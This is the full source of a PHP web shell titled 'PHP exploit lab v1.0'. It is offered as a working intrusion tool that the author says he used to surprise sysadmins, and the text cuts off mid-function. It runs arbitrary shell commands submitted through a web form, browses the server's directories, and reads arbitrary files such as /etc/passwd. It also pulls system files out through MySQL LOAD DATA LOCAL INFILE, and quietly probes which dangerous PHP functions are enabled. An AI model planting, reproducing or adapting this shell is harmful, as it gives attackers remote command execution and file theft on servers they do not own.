PHP exploit lab v1.0 - Attempts to browse, read, execute, and mysqlread.
1246fe064866a0ec61ae145cf847039bbc1ff2f2a60977d2c4104bfae6cf3569<?php
/*
* PHP exploit lab v1.0
* trying to browse, read, execute, mysqlread...
* using: PHP
* designed for: UNIX based OS's, but WIN32 shouldn't be a problem...
*
* 'the biggest security issues at company's mostly lies at their costumers'
* I suprised a lot of sysadmins using this, and it's also a good way tot test your mysql restrictions
*
* author:
* dodo
* dodo@fuckmicrosoft.com
* http://darkshells.ath.cx/
* +31612709939
*
* grtz: to my lovely girlfriend: Y, tsunami2k, draak, d-2000, dataholic, and many more...
*
*/
// mysql config: [this is for reading files through mysql]
$mysql_use = "no"; //"yes"
$mhost = "";
$muser = "";
$mpass = "";
$mdb = "";
// default mysql_read files [seperated by: ':']:
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
if ($action=="misc") {
if ($do=="phpinfo") {
phpinfo();
exit;
}
}
?>
<html>
<head>
<style>
BODY { font-family: verdana; color: cccccc; }
INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:9pt;}
TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:9pt;}
SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:9pt;}
</style>
<script>
function openw(url, width, height){
window.open(url, "HTTP_exploit_lab", "alwaysRaised=1,dependent=1,location=0,menubar=0,personalbar=0,scrollbars=1,status=0,toolbar=0,height=+height+,width=+width+,resizable=0");
}
</script>
<title>HTTP exploit lab by dodo</title>
</head>
<body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC">
<?
if (!$PHP_SELF) { $PHP_SELF="index.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ }
if ($action=="check") {
echo "<pre>";
if ($mysql_use!="no") {
$phpcheck = new php_check($mhost, $muser, $mpass, $mdb);
} else { $phpcheck = new php_check(); }
echo "</pre>";
}
if ($action=="mysqlread") {
// $file
if (!$file) { $file = "/etc/passwd"; }
?>
<script>
var files = new Array();
<? for($i=0;count($mysql_files)>$i;$i++) { ?>
files[files.length] = "<?=$mysql_files[$i]?>";
<? } ?>
function setFile(bla) {
for (var i=0;i < files.length;i++) {
if (files[i]==bla.value) {
document.mysqlload.file.value = files[i];
}
}
}
</script>
<form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST">
<select name="deffile" onChange="setFile(this)">
<? for ($i=0;count($mysql_files)>$i;$i++) { ?>
<option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><?
$bla = explode('/', $mysql_files[$i]);
$p = count($bla)-1;
echo $bla[$p];
?></option>
<? } ?>
</select>
<input type="text" name="file" value="<?=$file?>" size=80>
<input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font>
</form>
<?
echo "<pre>";
// regular LOAD DATA LOCAL INFILE
if (!$mass) {
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($q);
}
}
if ($mass) {
$file = "/etc/passwd";
$sql = array ();
$cp = mysql_connect ($mhost, $muser, $mpass);
mysql_select_db($mdb);
$tbl = "xploit";
mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)");
for($i=0;count($mysql_files)>$i;$i++) {
mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'");
}
$q = mysql_query("SELECT * FROM ".$tbl."");
while ($arr = mysql_fetch_array($q)) {
echo $arr[0]."\n";
}
mysql_query("DELETE FROM ".$tbl."");
mysql_query("DROP TABLE ".$tbl."");
}
echo "</pre>";
}
if ($action=="read") {
if (!$method) { $method="file"; }
if (!$file) { $file = "/etc/passwd"; }
?>
<form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read">
<select name="method">
<option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option>
<option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option>
<option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
<option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option>
</select><br>
<input type="text" name="file" size="40" value="<?=$file?>">
<input type="submit" name="Submit" value="<?=$method?>">
<br>
</form><?
if ($method=="file") {
if (@file($file)) {
$filer = file($file);
echo "<pre>";
foreach ($filer as $a) { echo $a; }
echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
}
}
if ($method=="fread") {
if (@fopen($file, 'r')) {
$fp = fopen($file, 'r');
$string = fread($fp, filesize($file));
echo "<pre>";
echo $string;
echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
}
}
if ($method=="show_source") {
if (show_source($file)) {
//echo "<pre>";
//echo show_source($file);
//echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
}
}
if ($method=="readfile") {
echo "<pre>";
if (readfile($file)) {
//echo "<pre>";
//echo readfile($file);
echo "</pre>";
} else {
echo "</pre>";
echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
}
}
}
if ($action=="cmd") { ?>
<form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd">
<select name="method">
<option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
</select><br>
<input type="text" name="cmd" size="40" value="<?= $cmd; ?>">
<input type="submit" name="Submit" value="<?=$method?>">
<br>
</form>
<?
if (!$method) { $method="system"; }
if (!$cmd) { $cmd = "ls /"; }
echo "<br><pre>";
if ($method=="system") {
system("$cmd 2>&1");
}
if ($method=="passthru") {
passthru("$cmd 2>&1");
}
if ($method=="exec") {
while ($string = exec("$cmd 2>&1")) {
echo $string;
}
}
if ($method=="shell_exec") {
$string = shell_exec("$cmd 2>&1");
echo $string;
}
if ($method=="popen") {
$pp = popen('$cmd 2>&1', 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
}
echo "</pre>";
}
if ($action=="cmdbrowse") {
//--------------------------------------------------- START CMD BROWSING
if ($cat) {
echo "<pre>";
echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n";
exec("cat $cat 2>&1", $arr);
foreach ($arr as $ar) {
echo htmlspecialchars($ar)."\n";
}
exit;
}
if ($dir=="dirup") {
$dir_current = $olddir;
$needle = strrpos($dir_current, "/");
if ($needle==0) {
$newdir = "/";
} else {
$newdir = substr($dir_current, 0, $needle);
}
$dir = $newdir;
}
if (!$dir) {
$dir = getcwd();
}
$string = exec("ls -al $dir", $array);
//print_r(array_values($array));
echo "<pre>";
if ($dir!="/") {
echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n";
} else {
$dir = "";
}
foreach($array as $rowi) {
$row = explode(' ', $rowi);
//print_r(array_values($row));
$c = count($row)-1;
if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
$link = false;
if (!strstr($row[0], 'l')) {
$c = count($row)-1;
$file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
} else {
$c = count($row)-3;
$file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
$link = true;
}
if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
$c = count($row)-1;
$file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>";
}
//echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
if ($link) {
$point = count($row)-3;
} else {
$point = count($row)-1;
}
for($i=0; $point > $i; $i++) {
echo $row[$i]." ";
}
echo $file."\n";
}
$first = true;
}
//--------------------------------------------------- END CMD BROWSING
}
if ($action=="browse") {
//--------------------------------------------------- START BROWSING
/*
* got this from an old script of mine
* param: [$dir]
*/
function error($msg) {
header("Location: $PHP_SELF?bash=$msg&error=$msg");
}
if (isset($error)) {
echo "<script> alert(\"$error\"); </script>";
}
if (!$dir) {
$dir = getcwd();
}
function getpath($dir) {
echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> ";
$path = explode('/', $dir);
if ($dir != "/") {
for ($i=0; count($path) > $i; $i++) {
if ($i != 0) {
echo "<font size=2><a href=$PHP_SELF?action=browse&dir=";
for ($o=0; ($i+1) > $o; $o++) {
echo "$path[$o]";
if (($i) !=$o) {
echo "/";
}
}
echo ">$path[$i]</a>/</font>";
}
}
}
}
function printfiles($files) {
for($i=0;count($files)>$i;$i++) {
$files_sm = explode('||', $files[$i]);
if ($files_sm[0]!="." && $files_sm[0]!="..") {
$perms = explode('|', $files_sm[1]);
if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
}
if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; }
if ($perms[0]==1) { echo "r"; } else { echo " "; }
if ($perms[1]==1) { echo "w"; } else { echo " "; }
if ($perms[2]==1) { echo "x"; } else { echo " "; }
echo "</font> $files_sm[0]\n";
}
}
}
function printdirs($files) {
global $dir;
echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n";
for($i=0;count($files)>$i;$i++) {
$files_sm = explode('||', $files[$i]);
if ($files_sm[0]!="." && $files_sm[0]!="..") {
$perms = explode('|', $files_sm[1]);
if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
}
if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; }
if ($perms[0]==1) { echo "r"; } else { echo " "; }
if ($perms[1]==1) { echo "w"; } else { echo " "; }
if ($perms[2]==1) { echo "x"; } else { echo " "; }
echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n";
}
}
}
if ($dir=="dirup") {
$dir_current = $olddir;
$needle = strrpos($dir_current, "/");
if ($needle==0) {
$newdir = "/";
} else {
$newdir = substr($dir_current, 0, $needle);
}
$dir = $newdir;
} else {
$dir = $dir;
}
?>
<form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse">
<input type="text" name="dir" size="40" value="<?= $dir; ?>">
<input type="submit" name="Submit" value="ls /dir">
<br>
</form>
<?
if ($dir) {
if (!is_readable($dir)) { $skip = true; }
if (!$skip) {
$dp = opendir($dir);
$files = array(); $dirs = array();
while($f=readdir($dp)) {
// $f||r|w|x||l
$oor = $f;
if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
if(is_dir("$dir/$oor")) {
$dirs[] = $f;
} else {
$files[] = $f;
}
}
getpath($dir);
echo "<br><br><pre>";
printdirs($dirs);
printfiles($files);
} else { echo " <script> alert(\"readdir permission denied\");
document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\";
</script>"; }
}
}
//--------------------------------------------------- END BROWSING
if (!$action) {
?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><?
echo "<pre>";
if ($mysql_use!="no") {
$phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
} else { $phpcheck = new php_check_silent(); }
echo "</pre>";
?><br><br>
<font size=2><a href="javascript:openw('<?=$PHP_SELF?>?action=check', 300, 500)">SECURITY CHECK</a></font> <font color="green" size=2>[executable] </font>
<br>
<!-- system check -->
<?
//echo $phpcheck->cmd_state;
//echo $phpcheck->cmd_method;
if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
<font size=2><a href="javascript:openw('<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>', 300, 500)">EXEC COMMANDS THRU PHP</a></font>
<?
if ($phpcheck->cmd_method) {
echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
?></font>
<br>
<!-- system check -->
<?
//echo $phpcheck->cmd_state;
//echo $phpcheck->cmd_method;
?>
<font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">EXEC BROWSE THRU PHP</a></font>
<?
if ($phpcheck->cmd_method) {
echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
?></font>
<br>
<!-- read check -->
<? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
<font size=2><a href="javascript:openw('<?=$PHP_SELF?>?action=read&method=<?=$read_method?>', 300, 500)">READ THRU PHP</a></font>
<?
if ($phpcheck->read_method) {
echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
?></font>
<br>
<!-- browse check -->
<?
//echo $phpcheck->browse_state;
if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
<font size=2><a href="javascript:openw('<?=$PHP_SELF?>?action=browse&dir=<?=$path?>', 300, 500)">BROWSE THRU PHP</a></font>
<?
if ($phpcheck->browse_state=="yes") {
echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
?></font>
<br>
<!-- mysql check -->
<font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">READ THRU MYSQL</a></font>
<?
if ($phpcheck->mysql_state=="ok") {
echo "<font color=\"green\" size=2>[executable] "; }
if ($phpcheck->mysql_state=="fail") {
echo "<font color=\"red\" size=2>[not executable] "; }
if ($phpcheck->mysql_state=="pass") {
echo "<font color=\"yellow\" size=2>[not executable] ";
?></font> <font size=1>[you didnt configure this]</font><font>
<?
} ?></font><?
}
?>
</body>
</html>
<?
// PHP security check objects by dodo
class php_check
{
function php_check($host="notset", $user="", $pass="", $db="") {
if ($host!="notset") {
$this->mysql_do = "yes";
$this->mysql_host = $host;
$this->mysql_user = $user;
$this->mysql_pass = $pass;
$this->mysql_db = $db;
} else { $this->mysql_do = "no"; }
$this->mainstate = "safe";
echo "<b>checking system functions:</b>\n";
if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
echo "<b>checking reading functions:</b>\n";
if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
echo "<b>checking misc filesystem functions:</b>\n";
if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
echo "<b>checking mysql functions:</b>\n";
$stater = $this->mysql_checks();
if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; }
}
function output_state($state = 0, $name = "function") {
if ($state==0) {
echo "$name\t\tfailed\n";
}
if ($state==1) {
echo "$name\t\t<font color=red>OK</font>\n";
}
if ($state==2) {
echo "$name\t\t<font color=yellow>OK</font>\n";
}
if ($state==3) {
echo "$name\t\t<font color=yellow>skipped</font>\n";
}
}
function output_mainstate($state = 0, $name = "functions") {
if ($state==1) {
echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
$this->mainstate = "unsafe";
}
if ($state==0) {
echo "\n$name returned: <font color=green>OK</font>\n\n";
$this->mainstate = "unsafe";
}
if ($state==2) {
echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n";
}
}
function system_checks($cmd = "/bin/ls") {
if ($pp = popen($cmd, "r")) {
if (fread($pp, 2096)) {
$this->output_state(1, "popen ");
$sys = true;
} else {
$this->output_state(0, "popen ");
}
} else { $this->output_state(0, "popen "); }
if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); }
if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
echo "<!-- \n";
if (@system($cmd)) { echo " -->"; $this->output_state(1, "system "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); }
echo "<!-- \n";
if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
//if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
}
function reading_checks($file = "/etc/passwd") {
if (@function_exists("require_once")) {
echo "<!--";
if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
}
if (@function_exists("require")) {
echo "<!--";
if (@require($file)) { echo "-->"; $this->output_state(1, "require "); $sys = true; } else { echo "-->"; $this->output_state(0, "require "); }
}
if (@function_exists("include")) {
echo "<!--";
if (@include($file)) { echo "-->"; $this->output_state(1, "include "); $sys = true; } else { echo "-->"; $this->output_state(0, "include "); }
}
//if (@function_exists("highlight_file")) {
echo "<!--";
if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
//}
//if (@function_exists("virtual")) {
echo "<!--";
if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual "); }
//}
if (@function_exists("file_get_contents")) {
if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
} else {
$this->output_state(0, "filegetcontents");
}
echo "<!-- ";
if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
echo "<!-- ";
if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); }
if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); }
if ($sys) { return 1; } else { return ; }
}
function miscfile_checks() {
$currentdir = @getcwd();
$scriptpath = $_SERVER["PATH_TRANSLATED"];
if (@opendir($currentdir)) {
$this->output_state(2, "opendir \$cwd");
$dp = @opendir("$currentdir");
$files="";
$this->browse_state = "lim";
while($file = @readdir($dp)) { $files .= $file; }
if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
} else { $this->output_state(0, "opendir \$cwd"); }
if (@opendir("/")) {
$this->output_state(1, "opendir /");
$sys = true;
$dp = @opendir("/");
$this->browse_state = "yes";
$files="";
while($file = @readdir($dp)) { $files .= $file; }
if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
} else { $this->output_state(0, "opendir /"); }
if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); }
if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); }
if (@copy($scriptpath, "$currentdir/copytest")) {
$this->output_state(2, "copy ");
$sys = true;
if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
} else {
$this->output_state(0, "copy ");
}
if (@copy($scriptpath, "/tmp/copytest")) {
$this->output_state(2, "copy2/tmp");
//$sys = true;
if (!$del) {
if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "copy2/tmp");
}
if (@link("/", "$currentdir/link2root")) {
$this->output_state(1, "link ");
$sys = true;
if (!$del) {
if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "link ");
}
if (@symlink("/", "$currentdir/link2root")) {
$this->output_state(1, "symlink ");
$sys = true;
if (!$del) {
if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "symlink ");
}
if ($sys) { return 1; } else { return ; }
}
function mysql_checks() {
if ($this->mysql_do=="yes") {
if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
$this->output_state(1, "mysql_pconnect"); $mstate = 1;
} else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
} else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
if ($this->mysql_do=="yes") {
if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
$this->output_state(1, "mysql_connect"); $mstate = 1;
} else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
} else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
if ($this->mysql_state=="fail") {
echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n";
echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
}
return $mstate;
}
}
class php_check_silent
{
function php_check_silent($host="notset", $username="", $pass="", $db="") {
if ($host!="notset") {
$this->mysql_do = "yes";
$this->mysql_host = $host;
$this->mysql_user = $username;
$this->mysql_pass = $pass;
$this->mysql_db = $db;
} else { $this->mysql_do = "no"; }
$this->mainstate = "safe";
if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
$this->mysql_checks();
}
function output_state($state = 0, $name = "function") {
if ($state==0) {
//echo "$name\t\tfailed\n";
}
if ($state==1) {
//echo "$name\t\t<font color=red>OK</font>\n";
}
if ($state==2) {
//echo "$name\t\t<font color=yellow>OK</font>\n";
}
}
function output_mainstate($state = 0, $name = "functions") {
if ($state==1) {
//echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
$this->mainstate = "unsafe";
} else {
//echo "\n$name returned: <font color=green>OK</font>\n\n";
}
}
function system_checks($cmd = "/bin/ls") {
if ($pp = popen($cmd, "r")) {
if (fread($pp, 2096)) {
$this->output_state(1, "popen ");
$sys = true;
} else {
$this->output_state(0, "popen ");
}
} else { $this->output_state(0, "popen "); }
if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); }
if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
echo "<!-- ";
if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
echo "<!-- ";
if (@system($cmd)) { echo " -->"; $this->output_state(1, "system "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); }
//if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
}
function reading_checks($file = "/etc/passwd") {
if (@function_exists("require_once")) {
if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
}
if (@function_exists("require")) {
if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
}
if (@function_exists("include")) {
if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
}
if (@function_exists("file_get_contents")) {
if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
} else {
$this->output_state(0, "filegetcontents");
}
echo "<!-- ";
if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
echo "<!-- ";
if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); }
if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); }
if ($sys) { return 1; } else { return ; }
}
function miscfile_checks() {
$currentdir = @getcwd();
$scriptpath = $_SERVER["PATH_TRANSLATED"];
if (@opendir($currentdir)) {
$this->output_state(2, "opendir \$cwd");
$dp = @opendir("$currentdir");
$files="";
$this->browse_state = "lim";
while($file = @readdir($dp)) { $files .= $file; }
if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
} else { $this->output_state(0, "opendir \$cwd"); }
if (@opendir("/")) {
$this->output_state(1, "opendir /");
$sys = true;
$dp = @opendir("/");
$this->browse_state = "yes";
$files="";
while($file = @readdir($dp)) { $files .= $file; }
if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
} else { $this->output_state(0, "opendir /"); }
if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); }
if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); }
if (@copy($scriptpath, "$currentdir/copytest")) {
$this->output_state(2, "copy ");
$sys = true;
if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
} else {
$this->output_state(0, "copy ");
}
if (@copy($scriptpath, "/tmp/copytest")) {
$this->output_state(2, "copy2/tmp");
//$sys = true;
if (!$del) {
if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "copy2/tmp");
}
if (@link("/", "$currentdir/link2root")) {
$this->output_state(1, "link ");
$sys = true;
if (!$del) {
if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "link ");
}
if (@symlink("/", "$currentdir/link2root")) {
$this->output_state(1, "symlink ");
$sys = true;
if (!$del) {
if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); }
}
} else {
$this->output_state(0, "symlink ");
}
if ($sys) { return 1; } else { return ; }
}
function mysql_checks() {
if ($this->mysql_do=="yes") {
if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
$this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
} else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
} else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
if ($this->mysql_do=="yes") {
if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
$this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
} else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
} else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
if ($this->mysql_state=="fail") {
